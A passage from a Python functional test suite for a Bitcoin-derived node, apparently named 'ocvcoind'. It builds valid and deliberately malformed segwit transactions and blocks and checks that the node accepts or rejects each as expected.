# Verify mempool acceptance and block validity
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=False, accepted=True)
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True, with_witness=True)
self.sync_blocks()
# Now test attempts to spend the output.
spend_tx = CTransaction()
spend_tx.vin.append(CTxIn(COutPoint(tx.sha256, 0), script_sig))
spend_tx.vout.append(CTxOut(tx.vout[0].nValue - 1000, CScript([OP_TRUE])))
spend_tx.rehash()
# This transaction should not be accepted into the mempool pre- or
# post-segwit. Mempool acceptance will use SCRIPT_VERIFY_WITNESS which
# will require a witness to spend a witness program regardless of
# segwit activation. Note that older ocvcoind's that are not
# segwit-aware would also reject this for failing CLEANSTACK.
with self.nodes[0].assert_debug_log(
expected_msgs=(spend_tx.hash, 'was not accepted: non-mandatory-script-verify-flag (Witness program was passed an empty witness)')):
test_transaction_acceptance(self.nodes[0], self.test_node, spend_tx, with_witness=False, accepted=False)
# Try to put the witness script in the scriptSig, should also fail.
spend_tx.vin[0].scriptSig = CScript([p2wsh_pubkey, b'a'])
spend_tx.rehash()
with self.nodes[0].assert_debug_log(
expected_msgs=(spend_tx.hash, 'was not accepted: mandatory-script-verify-flag-failed (Script evaluated without error but finished with a false/empty top stack element)')):
test_transaction_acceptance(self.nodes[0], self.test_node, spend_tx, with_witness=False, accepted=False)
# Now put the witness script in the witness, should succeed after
# segwit activates.
spend_tx.vin[0].scriptSig = script_sig
spend_tx.rehash()
spend_tx.wit.vtxinwit.append(CTxInWitness())
spend_tx.wit.vtxinwit[0].scriptWitness.stack = [b'a', witness_program]
# Verify mempool acceptance
test_transaction_acceptance(self.nodes[0], self.test_node, spend_tx, with_witness=True, accepted=True)
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [spend_tx])
# If we're after activation, then sending this with witnesses should be valid.
# This no longer works before activation, because SCRIPT_VERIFY_WITNESS
# is always set.
# TODO: rewrite this test to make clear that it only works after activation.
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Update self.utxo
self.utxo.pop(0)
self.utxo.append(UTXO(spend_tx.sha256, 0, spend_tx.vout[0].nValue))
@subtest # type: ignore
def test_witness_commitments(self):
"""Test witness commitments.
This test can only be run after segwit has activated."""
# First try a correct witness commitment.
block = self.build_next_block()
add_witness_commitment(block)
block.solve()
# Test the test -- witness serialization should be different
assert msg_block(block).serialize() != msg_no_witness_block(block).serialize()
# This empty block should be valid.
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Try to tweak the nonce
block_2 = self.build_next_block()
add_witness_commitment(block_2, nonce=28)
block_2.solve()
# The commitment should have changed!
assert block_2.vtx[0].vout[-1] != block.vtx[0].vout[-1]
# This should also be valid.
test_witness_block(self.nodes[0], self.test_node, block_2, accepted=True)
# Now test commitments with actual transactions
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
# Let's construct a witness program
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
# tx2 will spend tx1, and send back to a regular anyone-can-spend address
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, witness_program))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
tx2.rehash()
block_3 = self.build_next_block()
self.update_witness_block_with_transactions(block_3, [tx, tx2], nonce=1)
# Add an extra OP_RETURN output that matches the witness commitment template,
# even though it has extra data after the incorrect commitment.
# This block should fail.
block_3.vtx[0].vout.append(CTxOut(0, CScript([OP_RETURN, WITNESS_COMMITMENT_HEADER + ser_uint256(2), 10])))
block_3.vtx[0].rehash()
block_3.hashMerkleRoot = block_3.calc_merkle_root()
block_3.rehash()
block_3.solve()
test_witness_block(self.nodes[0], self.test_node, block_3, accepted=False)
# Add a different commitment with different nonce, but in the
# right location, and with some funds burned(!).
# This should succeed (nValue shouldn't affect finding the
# witness commitment).
add_witness_commitment(block_3, nonce=0)
block_3.vtx[0].vout[0].nValue -= 1
block_3.vtx[0].vout[-1].nValue += 1
block_3.vtx[0].rehash()
block_3.hashMerkleRoot = block_3.calc_merkle_root()
block_3.rehash()
assert len(block_3.vtx[0].vout) == 4 # 3 OP_returns
block_3.solve()
test_witness_block(self.nodes[0], self.test_node, block_3, accepted=True)
# Finally test that a block with no witness transactions can
# omit the commitment.
block_4 = self.build_next_block()
tx3 = CTransaction()
tx3.vin.append(CTxIn(COutPoint(tx2.sha256, 0), b""))
tx3.vout.append(CTxOut(tx.vout[0].nValue - 1000, witness_program))
tx3.rehash()
block_4.vtx.append(tx3)
block_4.hashMerkleRoot = block_4.calc_merkle_root()
block_4.solve()
test_witness_block(self.nodes[0], self.test_node, block_4, with_witness=False, accepted=True)
# Update available utxo's for use in later test.
self.utxo.pop(0)
self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
@subtest # type: ignore
def test_block_malleability(self):
# Make sure that a block that has too big a virtual size
# because of a too-large coinbase witness is not permanently
# marked bad.
block = self.build_next_block()
add_witness_commitment(block)
block.solve()
block.vtx[0].wit.vtxinwit[0].scriptWitness.stack.append(b'a' * 5000000)
assert get_virtual_size(block) > MAX_BLOCK_BASE_SIZE
# We can't send over the p2p network, because this is too big to relay
# TODO: repeat this test with a block that can be relayed
assert_equal('bad-witness-nonce-size', self.nodes[0].submitblock(block.serialize().hex()))
assert self.nodes[0].getbestblockhash() != block.hash
block.vtx[0].wit.vtxinwit[0].scriptWitness.stack.pop()
assert get_virtual_size(block) < MAX_BLOCK_BASE_SIZE
assert_equal(None, self.nodes[0].submitblock(block.serialize().hex()))
assert self.nodes[0].getbestblockhash() == block.hash
# Now make sure that malleating the witness reserved value doesn't
# result in a block permanently marked bad.
block = self.build_next_block()
add_witness_commitment(block)
block.solve()
# Change the nonce -- should not cause the block to be permanently
# failed
block.vtx[0].wit.vtxinwit[0].scriptWitness.stack = [ser_uint256(1)]
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Changing the witness reserved value doesn't change the block hash
block.vtx[0].wit.vtxinwit[0].scriptWitness.stack = [ser_uint256(0)]
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
@subtest # type: ignore
def test_witness_block_size(self):
# TODO: Test that non-witness carrying blocks can't exceed 1MB
# Skipping this test for now; this is covered in p2p-fullblocktest.py
# Test that witness-bearing blocks are limited at ceil(base + wit/4) <= 1MB.
block = self.build_next_block()
assert len(self.utxo) > 0
# Create a P2WSH transaction.
# The witness program will be a bunch of OP_2DROP's, followed by OP_TRUE.
# This should give us plenty of room to tweak the spending tx's
# virtual size.
NUM_DROPS = 200 # 201 max ops per script!
NUM_OUTPUTS = 50
witness_program = CScript([OP_2DROP] * NUM_DROPS + [OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
prevout = COutPoint(self.utxo[0].sha256, self.utxo[0].n)
value = self.utxo[0].nValue
parent_tx = CTransaction()
parent_tx.vin.append(CTxIn(prevout, b""))
child_value = int(value / NUM_OUTPUTS)
for _ in range(NUM_OUTPUTS):
parent_tx.vout.append(CTxOut(child_value, script_pubkey))
parent_tx.vout[0].nValue -= 50000
assert parent_tx.vout[0].nValue > 0
parent_tx.rehash()
child_tx = CTransaction()
for i in range(NUM_OUTPUTS):
child_tx.vin.append(CTxIn(COutPoint(parent_tx.sha256, i), b""))
child_tx.vout = [CTxOut(value - 100000, CScript([OP_TRUE]))]
for _ in range(NUM_OUTPUTS):
child_tx.wit.vtxinwit.append(CTxInWitness())
child_tx.wit.vtxinwit[-1].scriptWitness.stack = [b'a' * 195] * (2 * NUM_DROPS) + [witness_program]
child_tx.rehash()
self.update_witness_block_with_transactions(block, [parent_tx, child_tx])
vsize = get_virtual_size(block)
additional_bytes = (MAX_BLOCK_BASE_SIZE - vsize) * 4
i = 0
while additional_bytes > 0:
# Add some more bytes to each input until we hit MAX_BLOCK_BASE_SIZE+1
extra_bytes = min(additional_bytes + 1, 55)
block.vtx[-1].wit.vtxinwit[int(i / (2 * NUM_DROPS))].scriptWitness.stack[i % (2 * NUM_DROPS)] = b'a' * (195 + extra_bytes)
additional_bytes -= extra_bytes
i += 1
block.vtx[0].vout.pop() # Remove old commitment
add_witness_commitment(block)
block.solve()
vsize = get_virtual_size(block)
assert_equal(vsize, MAX_BLOCK_BASE_SIZE + 1)
# Make sure that our test case would exceed the old max-network-message
# limit
assert len(block.serialize()) > 2 * 1024 * 1024
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now resize the second transaction to make the block fit.
cur_length = len(block.vtx[-1].wit.vtxinwit[0].scriptWitness.stack[0])
block.vtx[-1].wit.vtxinwit[0].scriptWitness.stack[0] = b'a' * (cur_length - 1)
block.vtx[0].vout.pop()
add_witness_commitment(block)
block.solve()
assert get_virtual_size(block) == MAX_BLOCK_BASE_SIZE
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Update available utxo's
self.utxo.pop(0)
self.utxo.append(UTXO(block.vtx[-1].sha256, 0, block.vtx[-1].vout[0].nValue))
@subtest # type: ignore
def test_submit_block(self):
"""Test that submitblock adds the nonce automatically when possible."""
block = self.build_next_block()
# Try using a custom nonce and then don't supply it.
# This shouldn't possibly work.
add_witness_commitment(block, nonce=1)
block.vtx[0].wit = CTxWitness() # drop the nonce
block.solve()
assert_equal('bad-witness-merkle-match', self.nodes[0].submitblock(block.serialize().hex()))
assert self.nodes[0].getbestblockhash() != block.hash
# Now redo commitment with the standard nonce, but let ocvcoind fill it in.
add_witness_commitment(block, nonce=0)
block.vtx[0].wit = CTxWitness()
block.solve()
assert_equal(None, self.nodes[0].submitblock(block.serialize().hex()))
assert_equal(self.nodes[0].getbestblockhash(), block.hash)
# This time, add a tx with non-empty witness, but don't supply
# the commitment.
block_2 = self.build_next_block()
add_witness_commitment(block_2)
block_2.solve()
# Drop commitment and nonce -- submitblock should not fill in.
block_2.vtx[0].vout.pop()
block_2.vtx[0].wit = CTxWitness()
assert_equal('bad-txnmrklroot', self.nodes[0].submitblock(block_2.serialize().hex()))
# Tip should not advance!
assert self.nodes[0].getbestblockhash() != block_2.hash
@subtest # type: ignore
def test_extra_witness_data(self):
"""Test extra witness data in a transaction."""
block = self.build_next_block()
witness_program = CScript([OP_DROP, OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
# First try extra witness data on a tx that doesn't require a witness
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 2000, script_pubkey))
tx.vout.append(CTxOut(1000, CScript([OP_TRUE]))) # non-witness output
tx.wit.vtxinwit.append(CTxInWitness())
tx.wit.vtxinwit[0].scriptWitness.stack = [CScript([])]
tx.rehash()
self.update_witness_block_with_transactions(block, [tx])
# Extra witness data should not be allowed.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Try extra signature data. Ok if we're not spending a witness output.
block.vtx[1].wit.vtxinwit = []
block.vtx[1].vin[0].scriptSig = CScript([OP_0])
block.vtx[1].rehash()
add_witness_commitment(block)
block.solve()
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Now try extra witness/signature data on an input that DOES require a
# witness
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b"")) # witness output
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 1), b"")) # non-witness
tx2.vout.append(CTxOut(tx.vout[0].nValue, CScript([OP_TRUE])))
tx2.wit.vtxinwit.extend([CTxInWitness(), CTxInWitness()])
tx2.wit.vtxinwit[0].scriptWitness.stack = [CScript([CScriptNum(1)]), CScript([CScriptNum(1)]), witness_program]
tx2.wit.vtxinwit[1].scriptWitness.stack = [CScript([OP_TRUE])]
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx2])
# This has extra witness data, so it should fail.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now get rid of the extra witness, but add extra scriptSig data
tx2.vin[0].scriptSig = CScript([OP_TRUE])
tx2.vin[1].scriptSig = CScript([OP_TRUE])
tx2.wit.vtxinwit[0].scriptWitness.stack.pop(0)
tx2.wit.vtxinwit[1].scriptWitness.stack = []
tx2.rehash()
add_witness_commitment(block)
block.solve()
# This has extra signature data for a witness input, so it should fail.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now get rid of the extra scriptsig on the witness input, and verify
# success (even with extra scriptsig data in the non-witness input)
tx2.vin[0].scriptSig = b""
tx2.rehash()
add_witness_commitment(block)
block.solve()
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Update utxo for later tests
self.utxo.pop(0)
self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
@subtest # type: ignore
def test_max_witness_push_length(self):
"""Test that witness stack can only allow up to 520 byte pushes."""
block = self.build_next_block()
witness_program = CScript([OP_DROP, OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, CScript([OP_TRUE])))
tx2.wit.vtxinwit.append(CTxInWitness())
# First try a 521-byte stack element
tx2.wit.vtxinwit[0].scriptWitness.stack = [b'a' * (MAX_SCRIPT_ELEMENT_SIZE + 1), witness_program]
tx2.rehash()
self.update_witness_block_with_transactions(block, [tx, tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now reduce the length of the stack element
tx2.wit.vtxinwit[0].scriptWitness.stack[0] = b'a' * (MAX_SCRIPT_ELEMENT_SIZE)
add_witness_commitment(block)
block.solve()
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Update the utxo for later tests
self.utxo.pop()
self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
@subtest # type: ignore
def test_max_witness_program_length(self):
"""Test that witness outputs greater than 10kB can't be spent."""
MAX_PROGRAM_LENGTH = 10000
# This program is 19 max pushes (9937 bytes), then 64 more opcode-bytes.
long_witness_program = CScript([b'a' * MAX_SCRIPT_ELEMENT_SIZE] * 19 + [OP_DROP] * 63 + [OP_TRUE])
assert len(long_witness_program) == MAX_PROGRAM_LENGTH + 1
long_script_pubkey = script_to_p2wsh_script(long_witness_program)
block = self.build_next_block()
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, long_script_pubkey))
tx.rehash()
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, CScript([OP_TRUE])))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [b'a'] * 44 + [long_witness_program]
tx2.rehash()
self.update_witness_block_with_transactions(block, [tx, tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Try again with one less byte in the witness program
witness_program = CScript([b'a' * MAX_SCRIPT_ELEMENT_SIZE] * 19 + [OP_DROP] * 62 + [OP_TRUE])
assert len(witness_program) == MAX_PROGRAM_LENGTH
script_pubkey = script_to_p2wsh_script(witness_program)
tx.vout[0] = CTxOut(tx.vout[0].nValue, script_pubkey)
tx.rehash()
tx2.vin[0].prevout.hash = tx.sha256
tx2.wit.vtxinwit[0].scriptWitness.stack = [b'a'] * 43 + [witness_program]
tx2.rehash()
block.vtx = [block.vtx[0]]
self.update_witness_block_with_transactions(block, [tx, tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.utxo.pop()
self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
@subtest # type: ignore
def test_witness_input_length(self):
"""Test that vin length must match vtxinwit length."""
witness_program = CScript([OP_DROP, OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
# Create a transaction that splits our utxo into many outputs
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
value = self.utxo[0].nValue
for _ in range(10):
tx.vout.append(CTxOut(int(value / 10), script_pubkey))
tx.vout[0].nValue -= 1000
assert tx.vout[0].nValue >= 0
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Try various ways to spend tx that should all break.
# This "broken" transaction serializer will not normalize
# the length of vtxinwit.
class BrokenCTransaction(CTransaction):
def serialize_with_witness(self):
flags = 0
if not self.wit.is_null():
flags |= 1
r = b""
r += struct.pack("<i", self.nVersion)
if flags:
dummy = []
r += ser_vector(dummy)
r += struct.pack("<B", flags)
r += ser_vector(self.vin)
r += ser_vector(self.vout)
if flags & 1:
r += self.wit.serialize()
r += struct.pack("<I", self.nLockTime)
return r
tx2 = BrokenCTransaction()
for i in range(10):
tx2.vin.append(CTxIn(COutPoint(tx.sha256, i), b""))
tx2.vout.append(CTxOut(value - 3000, CScript([OP_TRUE])))
# First try using a too long vtxinwit
for i in range(11):
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[i].scriptWitness.stack = [b'a', witness_program]
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now try using a too short vtxinwit
tx2.wit.vtxinwit.pop()
tx2.wit.vtxinwit.pop()
block.vtx = [block.vtx[0]]
self.update_witness_block_with_transactions(block, [tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now make one of the intermediate witnesses be incorrect
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[-1].scriptWitness.stack = [b'a', witness_program]
tx2.wit.vtxinwit[5].scriptWitness.stack = [witness_program]
block.vtx = [block.vtx[0]]
self.update_witness_block_with_transactions(block, [tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Fix the broken witness and the block should be accepted.
tx2.wit.vtxinwit[5].scriptWitness.stack = [b'a', witness_program]
block.vtx = [block.vtx[0]]
self.update_witness_block_with_transactions(block, [tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.utxo.pop()
self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
@subtest # type: ignore
def test_tx_relay_after_segwit_activation(self):
"""Test transaction relay after segwit activation.
After segwit activates, verify that mempool:
- rejects transactions with unnecessary/extra witnesses
- accepts transactions with valid witnesses
and that witness transactions are relayed to non-upgraded peers."""
# Generate a transaction that doesn't require a witness, but send it
# with a witness. Should be rejected because we can't use a witness
# when spending a non-witness output.
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
tx.wit.vtxinwit.append(CTxInWitness())
tx.wit.vtxinwit[0].scriptWitness.stack = [b'a']
tx.rehash()
tx_hash = tx.sha256
# Verify that unnecessary witnesses are rejected.
self.test_node.announce_tx_and_wait_for_getdata(tx)
assert_equal(len(self.nodes[0].getrawmempool()), 0)
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=True, accepted=False)
# Verify that removing the witness succeeds.
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=False, accepted=True)
# Now try to add extra witness data to a valid witness tx.
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx_hash, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, script_pubkey))
tx2.rehash()
tx3 = CTransaction()
tx3.vin.append(CTxIn(COutPoint(tx2.sha256, 0), b""))
tx3.wit.vtxinwit.append(CTxInWitness())
# Add too-large for IsStandard witness and check that it does not enter reject filter
p2sh_program = CScript([OP_TRUE])
witness_program2 = CScript([b'a' * 400000])
tx3.vout.append(CTxOut(tx2.vout[0].nValue - 1000, script_to_p2sh_script(p2sh_program)))
tx3.wit.vtxinwit[0].scriptWitness.stack = [witness_program2]
tx3.rehash()
# Node will not be blinded to the transaction, requesting it any number of times
# if it is being announced via txid relay.
# Node will be blinded to the transaction via wtxid, however.
self.std_node.announce_tx_and_wait_for_getdata(tx3)
self.std_wtx_node.announce_tx_and_wait_for_getdata(tx3, use_wtxid=True)
test_transaction_acceptance(self.nodes[1], self.std_node, tx3, True, False, 'tx-size')
self.std_node.announce_tx_and_wait_for_getdata(tx3)
self.std_wtx_node.announce_tx_and_wait_for_getdata(tx3, use_wtxid=True, success=False)
# Remove witness stuffing, instead add extra witness push on stack
tx3.vout[0] = CTxOut(tx2.vout[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE]))
tx3.wit.vtxinwit[0].scriptWitness.stack = [CScript([CScriptNum(1)]), witness_program]
tx3.rehash()
test_transaction_acceptance(self.nodes[0], self.test_node, tx2, with_witness=True, accepted=True)
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, with_witness=True, accepted=False)
# Get rid of the extra witness, and verify acceptance.
tx3.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
# Also check that old_node gets a tx announcement, even though this is
# a witness transaction.
self.old_node.wait_for_inv([CInv(MSG_TX, tx2.sha256)]) # wait until tx2 was inv'ed
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, with_witness=True, accepted=True)
self.old_node.wait_for_inv([CInv(MSG_TX, tx3.sha256)])
# Test that getrawtransaction returns correct witness information
# hash, size, vsize
raw_tx = self.nodes[0].getrawtransaction(tx3.hash, 1)
assert_equal(int(raw_tx["hash"], 16), tx3.calc_sha256(True))
assert_equal(raw_tx["size"], len(tx3.serialize_with_witness()))
weight = len(tx3.serialize_with_witness()) + 3 * len(tx3.serialize_without_witness())
vsize = math.ceil(weight / 4)
assert_equal(raw_tx["vsize"], vsize)
assert_equal(raw_tx["weight"], weight)
assert_equal(len(raw_tx["vin"][0]["txinwitness"]), 1)
assert_equal(raw_tx["vin"][0]["txinwitness"][0], witness_program.hex())
assert vsize != raw_tx["size"]
# Cleanup: mine the transactions and update utxo for next test
self.nodes[0].generate(1)
assert_equal(len(self.nodes[0].getrawmempool()), 0)
self.utxo.pop(0)
self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
@subtest # type: ignore
def test_segwit_versions(self):
"""Test validity of future segwit version transactions.
Future segwit versions are non-standard to spend, but valid in blocks.
Sending to future segwit versions is always allowed.
Can run this before and after segwit activation."""
NUM_SEGWIT_VERSIONS = 17 # will test OP_0, OP1, ..., OP_16
if len(self.utxo) < NUM_SEGWIT_VERSIONS:
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
split_value = (self.utxo[0].nValue - 4000) // NUM_SEGWIT_VERSIONS
for _ in range(NUM_SEGWIT_VERSIONS):
tx.vout.append(CTxOut(split_value, CScript([OP_TRUE])))
tx.rehash()
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.utxo.pop(0)
for i in range(NUM_SEGWIT_VERSIONS):
self.utxo.append(UTXO(tx.sha256, i, split_value))
self.sync_blocks()
temp_utxo = []
tx = CTransaction()
witness_program = CScript([OP_TRUE])
witness_hash = sha256(witness_program)
assert_equal(len(self.nodes[1].getrawmempool()), 0)
for version in list(range(OP_1, OP_16 + 1)) + [OP_0]:
# First try to spend to a future version segwit script_pubkey.
if version == OP_1:
# Don't use 32-byte v1 witness (used by Taproot; see BIP 341)
script_pubkey = CScript([CScriptOp(version), witness_hash + b'\x00'])
else:
script_pubkey = CScript([CScriptOp(version), witness_hash])
tx.vin = [CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b"")]
tx.vout = [CTxOut(self.utxo[0].nValue - 1000, script_pubkey)]
tx.rehash()
test_transaction_acceptance(self.nodes[1], self.std_node, tx, with_witness=True, accepted=False)
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=True, accepted=True)
self.utxo.pop(0)
temp_utxo.append(UTXO(tx.sha256, 0, tx.vout[0].nValue))
self.nodes[0].generate(1) # Mine all the transactions
self.sync_blocks()
assert len(self.nodes[0].getrawmempool()) == 0
# Finally, verify that version 0 -> version 2 transactions
# are standard
script_pubkey = CScript([CScriptOp(OP_2), witness_hash])
tx2 = CTransaction()
tx2.vin = [CTxIn(COutPoint(tx.sha256, 0), b"")]
tx2.vout = [CTxOut(tx.vout[0].nValue - 1000, script_pubkey)]
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
tx2.rehash()
# Gets accepted to both policy-enforcing nodes and others.
test_transaction_acceptance(self.nodes[0], self.test_node, tx2, with_witness=True, accepted=True)
test_transaction_acceptance(self.nodes[1], self.std_node, tx2, with_witness=True, accepted=True)
temp_utxo.pop() # last entry in temp_utxo was the output we just spent
temp_utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
# Spend everything in temp_utxo into an segwit v1 output.
tx3 = CTransaction()
total_value = 0
for i in temp_utxo:
tx3.vin.append(CTxIn(COutPoint(i.sha256, i.n), b""))
tx3.wit.vtxinwit.append(CTxInWitness())
total_value += i.nValue
tx3.wit.vtxinwit[-1].scriptWitness.stack = [witness_program]
tx3.vout.append(CTxOut(total_value - 1000, script_pubkey))
tx3.rehash()
# First we test this transaction against fRequireStandard=true node
# making sure the txid is added to the reject filter
self.std_node.announce_tx_and_wait_for_getdata(tx3)
test_transaction_acceptance(self.nodes[1], self.std_node, tx3, with_witness=True, accepted=False, reason="bad-txns-nonstandard-inputs")
# Now the node will no longer ask for getdata of this transaction when advertised by same txid
self.std_node.announce_tx_and_wait_for_getdata(tx3, success=False)
# Spending a higher version witness output is not allowed by policy,
# even with fRequireStandard=false.
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, with_witness=True, accepted=False, reason="reserved for soft-fork upgrades")
# Building a block with the transaction must be valid, however.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx2, tx3])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.sync_blocks()
# Add utxo to our list
self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
@subtest # type: ignore
def test_premature_coinbase_witness_spend(self):
block = self.build_next_block()
# Change the output of the block to be a witness output.
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
block.vtx[0].vout[0].scriptPubKey = script_pubkey
# This next line will rehash the coinbase and update the merkle
# root, and solve.
self.update_witness_block_with_transactions(block, [])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
spend_tx = CTransaction()
spend_tx.vin = [CTxIn(COutPoint(block.vtx[0].sha256, 0), b"")]
spend_tx.vout = [CTxOut(block.vtx[0].vout[0].nValue, witness_program)]
spend_tx.wit.vtxinwit.append(CTxInWitness())
spend_tx.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
spend_tx.rehash()
# Now test a premature spend.
self.nodes[0].generate(98)
self.sync_blocks()
block2 = self.build_next_block()
self.update_witness_block_with_transactions(block2, [spend_tx])
test_witness_block(self.nodes[0], self.test_node, block2, accepted=False)
# Advancing one more block should allow the spend.
self.nodes[0].generate(1)
block2 = self.build_next_block()
self.update_witness_block_with_transactions(block2, [spend_tx])
test_witness_block(self.nodes[0], self.test_node, block2, accepted=True)
self.sync_blocks()
@subtest # type: ignore
def test_uncompressed_pubkey(self):
"""Test uncompressed pubkey validity in segwit transactions.
Uncompressed pubkeys are no longer supported in default relay policy,
but (for now) are still valid in blocks."""
# Segwit transactions using uncompressed pubkeys are not accepted
# under default policy, but should still pass consensus.
key = ECKey()
key.generate(False)
pubkey = key.get_pubkey().get_bytes()
assert_equal(len(pubkey), 65) # This should be an uncompressed pubkey
utxo = self.utxo.pop(0)
# Test 1: P2WPKH
# First create a P2WPKH output that uses an uncompressed pubkey
pubkeyhash = hash160(pubkey)
script_pkh = key_to_p2wpkh_script(pubkey)
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(utxo.sha256, utxo.n), b""))
tx.vout.append(CTxOut(utxo.nValue - 1000, script_pkh))
tx.rehash()
# Confirm it in a block.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Now try to spend it. Send it to a P2WSH output, which we'll
# use in the next test.
witness_program = CScript([pubkey, CScriptOp(OP_CHECKSIG)])
script_wsh = script_to_p2wsh_script(witness_program)
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, script_wsh))
script = keyhash_to_p2pkh_script(pubkeyhash)
sig_hash = SegwitV0SignatureHash(script, tx2, 0, SIGHASH_ALL, tx.vout[0].nValue)
signature = key.sign_ecdsa(sig_hash) + b'\x01' # 0x1 is SIGHASH_ALL
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [signature, pubkey]
tx2.rehash()
# Should fail policy test.
test_transaction_acceptance(self.nodes[0], self.test_node, tx2, True, False, 'non-mandatory-script-verify-flag (Using non-compressed keys in segwit)')
# But passes consensus.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx2])
